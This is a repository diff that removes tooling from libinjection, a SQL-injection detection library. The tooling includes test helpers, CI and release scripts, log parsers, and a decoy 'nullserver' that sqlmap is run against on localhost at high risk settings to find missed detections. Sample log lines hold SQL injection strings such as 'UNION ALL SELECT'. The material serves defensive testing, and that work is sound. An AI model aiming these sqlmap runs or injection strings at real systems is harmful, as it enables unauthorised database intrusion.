||||
while (libinjection.sqli_tokenize(sql_state) == 1) do
|
||||
out = out .. print_token(sql_state.current)
|
||||
end
|
||||
return out
|
||||
end
|
||||
|
||||
function test_tokens_mysql(input)
|
||||
local out = ''
|
||||
local sql_state = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sql_state, input, input:len(),
|
||||
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_MYSQL)
|
||||
while (libinjection.sqli_tokenize(sql_state) == 1) do
|
||||
out = out .. print_token(sql_state.current)
|
||||
end
|
||||
return out
|
||||
end
|
||||
|
||||
function test_folding(input)
|
||||
local out = ''
|
||||
local sql_state = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sql_state, input, input:len(), 0)
|
||||
libinjection.sqli_fingerprint(sql_state,
|
||||
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_ANSI)
|
||||
for i = 1, sql_state.fingerprint:len() do
|
||||
-- c array is still 0 based
|
||||
out = out .. print_token(libinjection.sqli_get_token(sql_state, i-1))
|
||||
end
|
||||
-- hack for when there is no output
|
||||
if out == '' then
|
||||
out = '\n'
|
||||
end
|
||||
|
||||
return out
|
||||
end
|
||||
|
||||
function test_fingerprints(input)
|
||||
local out = ''
|
||||
local sql_state = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sql_state, input, input:len(), 0)
|
||||
local issqli = libinjection.is_sqli(sql_state)
|
||||
if issqli == 1 then
|
||||
out = sql_state.fingerprint
|
||||
end
|
||||
return out
|
||||
end
|
||||
|
|
@ -1,85 +0,0 @@
|
|||
#!/bin/sh
|
||||
# this is the script that runs in CI
|
||||
set -e
|
||||
|
||||
DASH=----------------------
|
||||
echo $DASH
|
||||
gcc --version
|
||||
echo $DASH
|
||||
make clean
|
||||
make -e check
|
||||
make clean
|
||||
|
||||
#
|
||||
# Code coverage
|
||||
#
|
||||
export CC=gcc
|
||||
export CFLAGS="-ansi -g -O0 -fprofile-arcs -ftest-coverage -Wall -Wextra"
|
||||
|
||||
echo $DASH
|
||||
echo "Generating code coverage"
|
||||
echo "CFLAGS=$CFLAGS"
|
||||
echo
|
||||
make -e check
|
||||
if [ -n "$COVERALLS_REPO_TOKEN" ] ; then
|
||||
echo "uploading to coveralls"
|
||||
coveralls \
|
||||
--gcov-options '\-lp' \
|
||||
--exclude-pattern '.*h' \
|
||||
--exclude src/reader.c \
|
||||
--exclude src/example1.c \
|
||||
--exclude src/fptool.c \
|
||||
--exclude src/test_speed_sqli.c \
|
||||
--exclude src/test_speed_xss.c \
|
||||
--exclude src/testdriver.c \
|
||||
--exclude src/html5_cli.c \
|
||||
--exclude src/sqli_cli.c \
|
||||
--exclude python
|
||||
fi
|
||||
echo
|
||||
unset CC
|
||||
unset CFLAGS
|
||||
|
||||
echo
|
||||
echo $DASH
|
||||
clang --version
|
||||
echo $DASH
|
||||
./configure-clang.sh
|
||||
|
||||
echo
|
||||
echo $DASH
|
||||
echo "CLANG STATIC ANALYZER"
|
||||
echo
|
||||
cd src
|
||||
make analyze
|
||||
|
||||
echo
|
||||
echo $DASH
|
||||
cppcheck --version
|
||||
echo
|
||||
|
||||
cppcheck --std=c89 \
|
||||
--enable=all \
|
||||
--inconclusive \
|
||||
--suppress=variableScope \
|
||||
--suppress=missingIncludeSystem \
|
||||
--quiet \
|
||||
--error-exitcode=1 \
|
||||
--template='{file}:{line} {id} {severity} {message}' \
|
||||
.
|
||||
echo "passed"
|
||||
|
||||
echo $DASH
|
||||
export CFLAGS="-Wall -Wextra -Werror -pedantic -ansi -g -O1"
|
||||
export VALGRIND="valgrind --gen-suppressions=no --leak-check=full --show-leak-kinds=all --read-var-info=yes --error-exitcode=1 --track-origins=yes --suppressions=/build/src/alpine.supp"
|
||||
echo "GCC + VALGRIND"
|
||||
echo $VALGRIND
|
||||
echo
|
||||
make clean
|
||||
make -e check
|
||||
unset VALGRIND
|
||||
unset CFLAGS
|
||||
echo
|
||||
|
||||
echo
|
||||
echo "Done!"
|
|
@ -1,28 +0,0 @@
|
|||
#!/bin/bash
|
||||
set -e
|
||||
|
||||
# automated basic git tagging
|
||||
# 1) edit the version number in
|
||||
# c/libinjection_sqli.c
|
||||
# pyton/setup.py
|
||||
# 2) git add and commit
|
||||
# 3) run this
|
||||
# 4) done!
|
||||
#
|
||||
|
||||
# get tag number
|
||||
TAG=`grep 'LIBINJECTION_VERSION' ../c/libinjection_sqli.c | awk -F '"' '{print $2}' | tr -d '[[:space:]]'`
|
||||
|
||||
TAG="v${TAG}"
|
||||
|
||||
echo "TAG = ${TAG}"
|
||||
echo "Tagging locally"
|
||||
git tag -a "${TAG}" -m ${TAG}
|
||||
echo "Sharing..."
|
||||
git push origin "${TAG}"
|
||||
|
||||
git tag
|
||||
echo "DONE"
|
||||
|
||||
|
||||
|
|
@ -1,45 +0,0 @@
|
|||
LIBINJECTION
|
||||
==========================
|
||||
|
||||
Libinjection is a small C library to detect SQLi attacks in user input with the following goals:
|
||||
|
||||
* Open. Source code is on [GitHub](https://github.com/client9/libinjection/).
|
||||
* Low _false-positives_. When there are high false positives, people tend to turn off any WAF or protection.
|
||||
* Excellent detection of SQLi.
|
||||
* High performance (currently [over 500,000 TPS](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-speed/latest/console.txt))
|
||||
* Easy to test and QA
|
||||
* Easy to integrate and extend
|
||||
|
||||
### [Try it now](/diagnostics)
|
||||
|
||||
### Easy to integrate
|
||||
|
||||
* Standard C code, and compiles as C99 and C++, with bindings to
|
||||
* [Python](https://github.com/client9/libinjection/wiki/doc-sqli-python)
|
||||
* [PHP](https://github.com/client9/libinjection/wiki/doc-sqli-php)
|
||||
* [Lua](https://github.com/client9/libinjection/tree/master/lua)
|
||||
* Small - about [1500 lines of code](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-loc/latest/console.txt) in three files
|
||||
* Compiles on Linux/Unix/BSD, Mac and Windows
|
||||
* No threads used and thread safe
|
||||
* No recursion
|
||||
* No (heap) memory allocation
|
||||
* No extenal library dependencies
|
||||
* [400+ unit tests](https://github.com/client9/libinjection/tree/master/tests)
|
||||
* [98% code coverage](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-coverage-unittest/latest/lcov-html/libinjection/src/index.html)
|
||||
* [BSD License](https://github.com/client9/libinjection/blob/master/COPYING)
|
||||
|
||||
Third-Party Ports
|
||||
---------------------
|
||||
|
||||
* [java](https://github.com/Kanatoko/libinjection-Java)
|
||||
* At least two .NET ports exists
|
||||
* Another python wrapper
|
||||
|
||||
Applications
|
||||
---------------------
|
||||
|
||||
* [ModSecurity](http://www.modsecurity.org/) - since 2.7.4 release
|
||||
* [IronBee](https://www.ironbee.com) - since May 2013
|
||||
* Proprietary Honeypot
|
||||
* Proprietary WAF, Russia
|
||||
* Proprietary WAF, Japan
|
File diff suppressed because one or more lines are too long
Before Width: | Height: | Size: 944 KiB |
|
@ -1,64 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
import sys
|
||||
import re
|
||||
import libinjection
|
||||
import urllib
|
||||
import urlparse
|
||||
|
||||
logre = re.compile(r' /diagnostics\?([^ ]+) HTTP')
|
||||
|
||||
notsqli = set([
|
||||
'1ov',
|
||||
'UEvEv',
|
||||
'v',
|
||||
'Uv',
|
||||
'Uv,',
|
||||
'UoEvE',
|
||||
'1v',
|
||||
'sov',
|
||||
'1nn',
|
||||
'UonnE',
|
||||
'no1',
|
||||
'Evk',
|
||||
'E1k',
|
||||
'E11k',
|
||||
'Ek',
|
||||
'Uv,Ev',
|
||||
'UvEvk',
|
||||
'UvEv,',
|
||||
'Uvon'
|
||||
])
|
||||
|
||||
def doline(logline):
|
||||
"""
|
||||
...GET /diagnostics?id=%22union+select HTTP/1.1
|
||||
"""
|
||||
mo = logre.search(logline)
|
||||
if not mo:
|
||||
return
|
||||
|
||||
sqli= False
|
||||
fp = None
|
||||
for key, val in urlparse.parse_qsl(mo.group(1)):
|
||||
val = urllib.unquote(val)
|
||||
extra = {}
|
||||
argsqli = libinjection.detectsqli(val, extra)
|
||||
if argsqli:
|
||||
fp = extra['fingerprint']
|
||||
print urllib.quote(val)
|
||||
sqli = sqli or argsqli
|
||||
|
||||
if False: # and not sqli:
|
||||
#print "\n---"
|
||||
#print mo.group(1)
|
||||
for key, val in urlparse.parse_qsl(mo.group(1)):
|
||||
val = urllib.unquote(val)
|
||||
extra = {}
|
||||
argsqli = libinjection.detectsqli(val, extra)
|
||||
if not argsqli and extra['fingerprint'] not in notsqli:
|
||||
print "NO", extra['fingerprint'], mo.group(1)
|
||||
print " ", val
|
||||
|
||||
if __name__ == '__main__':
|
||||
for line in sys.stdin:
|
||||
doline(line)
|
|
@ -1,213 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
import datetime
|
||||
import json
|
||||
import sys
|
||||
from urlparse import *
|
||||
import urllib
|
||||
import libinjection
|
||||
|
||||
from tornado import template
|
||||
from tornado.escape import *
|
||||
|
||||
import re
|
||||
import calendar
|
||||
|
||||
months = {
|
||||
'Jan':'01',
|
||||
'Feb':'02',
|
||||
'Mar':'03',
|
||||
'Apr':'04',
|
||||
'May':'05',
|
||||
'Jun':'06',
|
||||
'Jul':'07',
|
||||
'Aug':'08',
|
||||
'Sep':'09',
|
||||
'Oct':'10',
|
||||
'Nov':'11',
|
||||
'Dec':'12'
|
||||
}
|
||||
|
||||
# "time_iso8601":"2013-08-04T03:51:18+00:00"
|
||||
def parse_date(datestr):
|
||||
elems = (
|
||||
datestr[7:11],
|
||||
months[datestr[3:6]],
|
||||
datestr[0:2],
|
||||
datestr[12:14],
|
||||
datestr[15:17],
|
||||
datestr[18:20],
|
||||
)
|
||||
|
||||
return ( "{0}-{1}-{2}T{3}:{4}:{5}+00:00".format(*elems), calendar.timegm( [ int(i) for i in elems] ) )
|
||||
|
||||
|
||||
apachelogre = re.compile(r'^(\S*) (\S*) (\S*) \[([^\]]+)\] \"([^"\\]*(?:\\.[^"\\]*)*)\" (\S*) (\S*) \"([^"\\]*(?:\\.[^"\\]*)*)\" \"([^"]*)\" \"([^"]*)\"')
|
||||
|
||||
def parse_apache(line):
|
||||
mo = apachelogre.match(line)
|
||||
if not mo:
|
||||
return None
|
||||
(time_iso, timestamp) = parse_date(mo.group(4))
|
||||
try:
|
||||
(method, uri, protocol) = mo.group(5).split(' ', 2)
|
||||
except ValueError:
|
||||
(method, uri, protocol) = ('-', '-', '-')
|
||||
data = {
|
||||
'remote_addr': mo.group(1),
|
||||
'time_iso8601': time_iso,
|
||||
'timestamp' : timestamp,
|
||||
'request_protocol': protocol,
|
||||
'request_method': method,
|
||||
'request_uri': uri,
|
||||
'request_length': '',
|
||||
'request_time': '',
|
||||
'status': mo.group(6),
|
||||
'bytes_sent': '',
|
||||
'body_bytes-sent': int(mo.group(7)),
|
||||
'http_referrer': mo.group(8),
|
||||
'http_user_agent': mo.group(9),
|
||||
'ssl_cipher': '',
|
||||
'ssl_protocol': ''
|
||||
}
|
||||
return data
|
||||
|
||||
# http://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks-in-python
|
||||
def chunks(l, n):
|
||||
"""
|
||||
Yield successive n-sized chunks from l.
|
||||
"""
|
||||
for i in xrange(0, len(l), n):
|
||||
yield l[i:i+n]
|
||||
|
||||
def breakify(s):
|
||||
output = ""
|
||||
for c in chunks(s, 40):
|
||||
output += c
|
||||
if ' ' not in c:
|
||||
output += ' '
|
||||
return output
|
||||
|
||||
def doline(line):
|
||||
|
||||
line = line.replace("\\x", "%").strip()
|
||||
try:
|
||||
data = json.loads(line)
|
||||
except ValueError, e:
|
||||
data = parse_apache(line)
|
||||
|
||||
if data is None:
|
||||
sys.stderr.write("BAD LINE: {0}\n".format(line))
|
||||
return None
|
||||
|
||||
if not data.get('request_uri','').startswith("/diagnostics"):
|
||||
return None
|
||||
|
||||
urlparts = urlparse(data['request_uri'])
|
||||
if len(urlparts.query) == 0:
|
||||
return None
|
||||
|
||||
qsl = [ x.split('=', 1) for x in urlparts.query.split('&') ]
|
||||
|
||||
target = None
|
||||
for k,v in qsl:
|
||||
if k == 'id':
|
||||
target = v
|
||||
break
|
||||
|
||||
if target is None:
|
||||
#print "no 'id'"
|
||||
return None
|
||||
|
||||
# part one, normal decode
|
||||
target = urllib.unquote_plus(target)
|
||||
|
||||
# do it again, but preserve '+'
|
||||
target = urllib.unquote(target)
|
||||
|
||||
sstate = libinjection.sqli_state()
|
||||
# BAD the string created by target.encode is stored in
|
||||
# sstate but not reference counted, so it can get
|
||||
# deleted by python
|
||||
# libinjection.sqli_init(sstate, target.encode('utf-8'), 0)
|
||||
|
||||
# instead make a temporary var in python
|
||||
# with the same lifetime as sstate (above)
|
||||
try:
|
||||
targetutf8 = target.encode('utf-8')
|
||||
#targetutf8 = target
|
||||
except UnicodeDecodeError, e:
|
||||
targetutf8 = target
|
||||
#if type(target) == str:
|
||||
# sys.stderr.write("Target is a string\n")
|
||||
#if type(target) == unicode:
|
||||
# sys.stderr.write("Target is unicde\n")
|
||||
#sys.stderr.write("OOps: {0}\n".format(e))
|
||||
#sys.stderr.write("Encode error: {0}\n".format(target))
|
||||
|
||||
|
||||
try:
|
||||
libinjection.sqli_init(sstate, targetutf8, 0)
|
||||
except TypeError:
|
||||
sys.stderr.write("fail in decode: {0}".format(targetutf8))
|
||||
if type(target) == str:
|
||||
sys.stderr.write("Target is a string\n")
|
||||
if type(target) == unicode:
|
||||
sys.stderr.write("Target is unicde\n")
|
||||
return None
|
||||
|
||||
sqli = bool(libinjection.is_sqli(sstate))
|
||||
|
||||
return (target, sqli, sstate.fingerprint, data['remote_addr'])
|
||||
|
||||
if __name__ == '__main__':
|
||||
s = """
|
||||
174.7.27.149 - - [29/Jul/2013:01:30:19 +0000] "GET /diagnostics?id=x|x||1&type=fingerprints HTTP/1.1" 200 1327 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36" "-"
|
||||
"""
|
||||
s = """
|
||||
{"timestamp":1371091563,"remote_ip":"219.110.171.2","request":"/diagnostics?id=1+UNION+ALL+SELECT+1<<<&type=fingerprints","method":"GET","status":200,"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1","referrer":"https://libinjection.client9.com/diagnostics","duration_usec":160518 }
|
||||
{"timestamp":1371091563,"remote_ip":"219.110.171.2","request":"/diagnostics?id=2+UNION+ALL+SELECT+1<<<&type=fingerprints","method":"GET","status":200,"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1","referrer":"https://libinjection.client9.com/diagnostics","duration_usec":160518 }
|
||||
"""
|
||||
if len(sys.argv) == 2:
|
||||
fh = open(sys.argv[1], 'r')
|
||||
else:
|
||||
fh = sys.stdin
|
||||
|
||||
targets = set()
|
||||
table = []
|
||||
for line in fh:
|
||||
parts = doline(line.strip())
|
||||
if parts is None:
|
||||
continue
|
||||
|
||||
# help it render in HTML
|
||||
if parts[0] in targets:
|
||||
continue
|
||||
else:
|
||||
targets.add(parts[0])
|
||||
|
||||
# add link
|
||||
# add form that might render ok in HTML
|
||||
# is sqli
|
||||
# fingerprint
|
||||
table.append( (
|
||||
"/diagnostics?id=" + url_escape(parts[0]),
|
||||
breakify(parts[0].replace(',', ', ').replace('/*', ' /*')),
|
||||
parts[1],
|
||||
parts[2],
|
||||
parts[3]
|
||||
)
|
||||
)
|
||||
|
||||
table = reversed(table)
|
||||
|
||||
loader = template.Loader(".")
|
||||
|
||||
txt = loader.load("logtable.html").generate(
|
||||
table=table,
|
||||
now = str(datetime.datetime.now()),
|
||||
ssl_protocol='',
|
||||
ssl_cipher=''
|
||||
)
|
||||
|
||||
print txt
|
|
@ -1,8 +0,0 @@
|
|||
#!/bin/bash
|
||||
fname=$1
|
||||
|
||||
echo '{% extends "base.html" %}'
|
||||
echo '{% block body %}'
|
||||
#github-markup $fname
|
||||
curl -H 'Content-Type: text/x-markdown' --data-binary @$fname https://api.github.com/markdown/raw
|
||||
echo '{% end %}'
|
|
@ -1,79 +0,0 @@
|
|||
#!/bin/bash
|
||||
|
||||
#
|
||||
# Sync ModSecurity / libinjection
|
||||
#
|
||||
|
||||
# explode on error
|
||||
set -e
|
||||
|
||||
#
|
||||
# CLONE LIBINJECTION
|
||||
#
|
||||
if [ ! -d libinjection ]; then
|
||||
git clone https://github.com/client9/libinjection.git
|
||||
else
|
||||
(cd libinjection; git pull)
|
||||
fi
|
||||
|
||||
pwd
|
||||
|
||||
#
|
||||
# CLONE MODSECURITY
|
||||
#
|
||||
if [ ! -d ModSecurity ]; then
|
||||
git clone https://github.com/client9/ModSecurity.git
|
||||
else
|
||||
( cd ModSecurity; git pull )
|
||||
fi
|
||||
pwd
|
||||
|
||||
#
|
||||
# Use right branch
|
||||
#
|
||||
(cd ModSecurity; git checkout remotes/trunk )
|
||||
|
||||
pwd
|
||||
|
||||
#
|
||||
# COPY IN NEW LIBINJECTION
|
||||
#
|
||||
cp libinjection/COPYING.txt ModSecurity/apache2/
|
||||
cp libinjection/c/libinjection.h ModSecurity/apache2/libinjection
|
||||
cp libinjection/c/libinjection_sqli.c ModSecurity/apache2/libinjection
|
||||
cp libinjection/c/libinjection_sqli.h ModSecurity/apache2/libinjection
|
||||
cp libinjection/c/libinjection_sqli_data.h ModSecurity/apache2/libinjection
|
||||
|
||||
|
||||
#
|
||||
# REGENERATE / BUILD
|
||||
#
|
||||
cd ModSecurity
|
||||
./autogen.sh
|
||||
./configure
|
||||
make
|
||||
make distclean
|
||||
|
||||
#
|
||||
# ADD NEW BITS
|
||||
#
|
||||
git add apache2/libinjection/COPYING.txt
|
||||
git add apache2/libinjection/libinjection.h
|
||||
git add apache2/libinjection/libinjection_sqli.h
|
||||
git add apache2/libinjection/libinjection_sqli.c
|
||||
git add apache2/libinjection/libinjection_sqli_data.h
|
||||
|
||||
# this file seems to get modified, reset just to be safe
|
||||
git checkout standalone/Makefile.in
|
||||
|
||||
git commit -m 'libinjection sync'
|
||||
|
||||
#
|
||||
# PUSH TO SPECIAL BRANCH
|
||||
#
|
||||
echo "pushing to remotes/trunk"
|
||||
git push origin remotes/trunk
|
||||
|
||||
#
|
||||
# PROFIT
|
||||
#
|
|
@ -1,47 +0,0 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
mysql_ops = (
|
||||
'AND',
|
||||
'&&',
|
||||
'=',
|
||||
'&',
|
||||
'|',
|
||||
'^',
|
||||
'DIV',
|
||||
'/',
|
||||
'<=>',
|
||||
'>=',
|
||||
'>',
|
||||
'<<',
|
||||
'<=',
|
||||
'<',
|
||||
'LIKE',
|
||||
'-',
|
||||
'%',
|
||||
'MOD',
|
||||
'!=',
|
||||
'<>',
|
||||
'NOT LIKE',
|
||||
'NOT REGEXP',
|
||||
'OR',
|
||||
'||',
|
||||
'+',
|
||||
'REGEXP',
|
||||
'>>',
|
||||
'RLIKE',
|
||||
'NOT RLIKE',
|
||||
'SOUNDS LIKE',
|
||||
'*',
|
||||
'XOR'
|
||||
)
|
||||
|
||||
print '# mysql implicit conversions tests'
|
||||
|
||||
for op in mysql_ops:
|
||||
if op == '+':
|
||||
op = '%2B'
|
||||
|
||||
print "A' {0} 'B".format(op)
|
||||
print "A '{0}' B".format(op)
|
||||
print "'{0}'".format(op)
|
||||
print "' {0} '".format(op)
|
|
@ -1,111 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
# A 'nullserver' that accepts input and generates output
|
||||
# to trick sqlmap into thinking it's a database-driven site
|
||||
#
|
||||
|
||||
import sys
|
||||
import logging
|
||||
import urllib
|
||||
|
||||
import tornado.httpserver
|
||||
import tornado.ioloop
|
||||
import tornado.web
|
||||
import libinjection
|
||||
|
||||
class ShutdownHandler(tornado.web.RequestHandler):
|
||||
def get(self):
|
||||
global fd
|
||||
fd.close()
|
||||
sys.exit(0)
|
||||
|
||||
|
||||
class CountHandler(tornado.web.RequestHandler):
|
||||
def get(self):
|
||||
global count
|
||||
self.write(str(count) + "\n")
|
||||
|
||||
def boring(arg):
|
||||
if arg == '':
|
||||
return True
|
||||
|
||||
if arg == 'foo':
|
||||
return True
|
||||
|
||||
if arg == 'NULL':
|
||||
return True
|
||||
|
||||
try:
|
||||
float(arg)
|
||||
return True
|
||||
except ValueError:
|
||||
pass
|
||||
|
||||
return False;
|
||||
|
||||
class NullHandler(tornado.web.RequestHandler):
|
||||
|
||||
def get(self):
|
||||
global fd
|
||||
global count
|
||||
params = self.request.arguments.get('id', [])
|
||||
sqli = False
|
||||
|
||||
if len(params) == 0 or (len(params) == 1 and boring(params[0])):
|
||||
# if no args, or a single value with uninteresting input
|
||||
# then just exit
|
||||
self.write("<html><head><title>safe</title></head><body></body></html>")
|
||||
return
|
||||
|
||||
for arg in params:
|
||||
sqli = libinjection.detectsqli(arg)
|
||||
if sqli:
|
||||
break
|
||||
|
||||
# we didn't detect it :-(
|
||||
if not sqli:
|
||||
count += 1
|
||||
args = [ arg.strip() for arg in params ]
|
||||
#fd.write(' | '.join(args) + "\n")
|
||||
for arg in args:
|
||||
extra = {}
|
||||
sqli = libinjection.detectsqli(arg, extra)
|
||||
logging.error("\t" + arg + "\t" + str(sqli) + "\t" + extra['fingerprint'] + "\n")
|
||||
#for arg in param:
|
||||
# fd.write(arg + "\n")
|
||||
# #fd.write(urllib.quote_plus(arg) + "\n")
|
||||
self.set_status(500)
|
||||
self.write("<html><head><title>safe</title></head><body></body></html>")
|
||||
else:
|
||||
self.write("<html><head><title>sqli</title></head><body></body></html>")
|
||||
|
||||
import os
|
||||
settings = {
|
||||
"static_path": os.path.join(os.path.dirname(__file__), "static"),
|
||||
"cookie_secret": "yo mama sayz=",
|
||||
"xsrf_cookies": True,
|
||||
"gzip": False
|
||||
}
|
||||
|
||||
application = tornado.web.Application([
|
||||
(r"/null", NullHandler),
|
||||
(r"/shutdown", ShutdownHandler),
|
||||
(r"/count", CountHandler)
|
||||
], **settings)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
global fd
|
||||
global count
|
||||
|
||||
count = 0
|
||||
|
||||
fd = open('./sqlmap-false-negatives.txt', 'w')
|
||||
|
||||
import tornado.options
|
||||
#tornado.options.parse_config_file("/etc/server.conf")
|
||||
tornado.options.parse_command_line()
|
||||
|
||||
http_server = tornado.httpserver.HTTPServer(application)
|
||||
http_server.listen(8888)
|
||||
tornado.ioloop.IOLoop.instance().start()
|
|
@ -1,29 +0,0 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Starts a bogus webserver that logs all input
|
||||
# Then runs sqlmap
|
||||
#
|
||||
|
||||
./nullserver.py --logging=none &
|
||||
|
||||
if [ ! -d "sqlmap" ]; then
|
||||
git clone https://github.com/sqlmapproject/sqlmap.git
|
||||
else
|
||||
(cd sqlmap; git pull)
|
||||
fi
|
||||
|
||||
SQLMAP=./sqlmap/sqlmap.py
|
||||
URL=http://127.0.0.1:8888
|
||||
|
||||
HPP=
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1234.5
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=foo
|
||||
|
||||
HPP=--hpp
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=1234.5
|
||||
${SQLMAP} ${HPP} -v 0 --titles -p id --level=5 --risk=3 --url=${URL}/null?id=foo
|
||||
|
||||
curl -o /dev/null ${URL}/shutdown
|
||||
|
|
@ -1,339 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
#
|
||||
#
|
||||
#
|
||||
|
||||
import datetime
|
||||
import sys
|
||||
import logging
|
||||
import urllib
|
||||
import urlparse
|
||||
try:
|
||||
import libinjection
|
||||
except:
|
||||
pass
|
||||
|
||||
from tornado import template
|
||||
import tornado.httpserver
|
||||
import tornado.ioloop
|
||||
import tornado.web
|
||||
import tornado.wsgi
|
||||
import tornado.escape
|
||||
import tornado.options
|
||||
|
||||
def breakapart(s):
|
||||
""" attempts to add spaces in a SQLi so it renders nicely on the webpage
|
||||
"""
|
||||
return s.replace(',', ', ').replace('/*',' /*')
|
||||
|
||||
# http://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks-in-python
|
||||
def chunks(l, n):
|
||||
""" Yield successive n-sized chunks from l.
|
||||
"""
|
||||
for i in xrange(0, len(l), n):
|
||||
yield l[i:i+n]
|
||||
|
||||
def breakify(s):
|
||||
output = ""
|
||||
for c in chunks(s, 20):
|
||||
output += c
|
||||
if ' ' not in c:
|
||||
output += ' '
|
||||
return output
|
||||
|
||||
def print_token_string(tok):
|
||||
"""
|
||||
returns the value of token, handling opening and closing quote characters
|
||||
"""
|
||||
out = ''
|
||||
if tok.str_open != '\0':
|
||||
out += tok.str_open
|
||||
out += tok.val
|
||||
if tok.str_close != '\0':
|
||||
out += tok.str_close
|
||||
return out
|
||||
|
||||
def print_token(tok):
|
||||
"""
|
||||
prints a token for use in unit testing
|
||||
"""
|
||||
out = ''
|
||||
if tok.type == 's':
|
||||
out += print_token_string(tok)
|
||||
elif tok.type == 'v':
|
||||
vc = tok.count;
|
||||
if vc == 1:
|
||||
out += '@'
|
||||
elif vc == 2:
|
||||
out += '@@'
|
||||
out += print_token_string(tok)
|
||||
else:
|
||||
out += tok.val
|
||||
return (tok.type, out)
|
||||
|
||||
def alltokens(val, flags):
|
||||
|
||||
if flags & libinjection.FLAG_QUOTE_SINGLE:
|
||||
contextstr = 'single'
|
||||
elif flags & libinjection.FLAG_QUOTE_DOUBLE:
|
||||
contextstr = 'double'
|
||||
else:
|
||||
contextstr = 'none'
|
||||
|
||||
if flags & libinjection.FLAG_SQL_ANSI:
|
||||
commentstr = 'ansi'
|
||||
elif flags & libinjection.FLAG_SQL_MYSQL:
|
||||
commentstr = 'mysql'
|
||||
else:
|
||||
raise RuntimeException("bad quote context")
|
||||
|
||||
parse = {
|
||||
'comment': commentstr,
|
||||
'quote': contextstr
|
||||
}
|
||||
args = []
|
||||
sqlstate = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sqlstate, val, flags)
|
||||
count = 0
|
||||
while count < 25:
|
||||
count += 1
|
||||
ok = libinjection.sqli_tokenize(sqlstate)
|
||||
if ok == 0:
|
||||
break
|
||||
args.append(print_token(sqlstate.current))
|
||||
|
||||
|
||||
parse['tokens'] = args
|
||||
|
||||
args = []
|
||||
fingerprint = libinjection.sqli_fingerprint(sqlstate, flags)
|
||||
for i in range(len(sqlstate.fingerprint)):
|
||||
args.append(print_token(libinjection.sqli_get_token(sqlstate,i)))
|
||||
parse['folds'] = args
|
||||
parse['sqli'] = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
|
||||
parse['fingerprint'] = fingerprint
|
||||
# todo add stats
|
||||
|
||||
return parse
|
||||
|
||||
class PageHandler(tornado.web.RequestHandler):
|
||||
def get(self, pagename):
|
||||
if pagename == '':
|
||||
pagename = 'home'
|
||||
|
||||
self.add_header('X-Content-Type-Options', 'nosniff')
|
||||
self.add_header('X-XSS-Protection', '0')
|
||||
|
||||
self.render(
|
||||
pagename + '.html',
|
||||
title = pagename.replace('-',' '),
|
||||
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
|
||||
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
|
||||
)
|
||||
|
||||
class XssTestHandler(tornado.web.RequestHandler):
|
||||
def get(self):
|
||||
settings = self.application.settings
|
||||
|
||||
ldr = template.Loader(".")
|
||||
|
||||
args = ['', '', '', '', '', '', '', '', '', '']
|
||||
|
||||
qsl = [ x.split('=', 1) for x in self.request.query.split('&') ]
|
||||
for kv in qsl:
|
||||
print kv
|
||||
try:
|
||||
index = int(kv[0])
|
||||
val = tornado.escape.url_unescape(kv[1])
|
||||
print "XXX", index, val
|
||||
args[index] = val
|
||||
except Exception,e:
|
||||
print e
|
||||
|
||||
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
|
||||
self.add_header('Pragma', 'no-cache')
|
||||
self.add_header('Expires', '0')
|
||||
self.add_header('X-Content-Type-Options', 'nosniff')
|
||||
self.add_header('X-XSS-Protection', '0')
|
||||
|
||||
self.write(ldr.load('xsstest.html').generate(args=args))
|
||||
|
||||
class DaysSinceHandler(tornado.web.RequestHandler):
|
||||
def get(self):
|
||||
lastevasion = datetime.date(2013, 9, 12)
|
||||
today = datetime.date.today()
|
||||
daynum = (today - lastevasion).days
|
||||
if daynum < 10:
|
||||
days = "00" + str(daynum)
|
||||
elif daynum < 100:
|
||||
days = "0" + str(daynum)
|
||||
else:
|
||||
days = str(daynum)
|
||||
|
||||
self.render(
|
||||
"days-since-last-bypass.html",
|
||||
title='libinjection: Days Since Last Bypass',
|
||||
days=days,
|
||||
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
|
||||
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
|
||||
)
|
||||
|
||||
class NullHandler(tornado.web.RequestHandler):
|
||||
def get(self):
|
||||
arg = self.request.arguments.get('type', [])
|
||||
if len(arg) > 0 and arg[0] == 'tokens':
|
||||
return self.get_tokens()
|
||||
else:
|
||||
return self.get_fingerprints()
|
||||
|
||||
def get_tokens(self):
|
||||
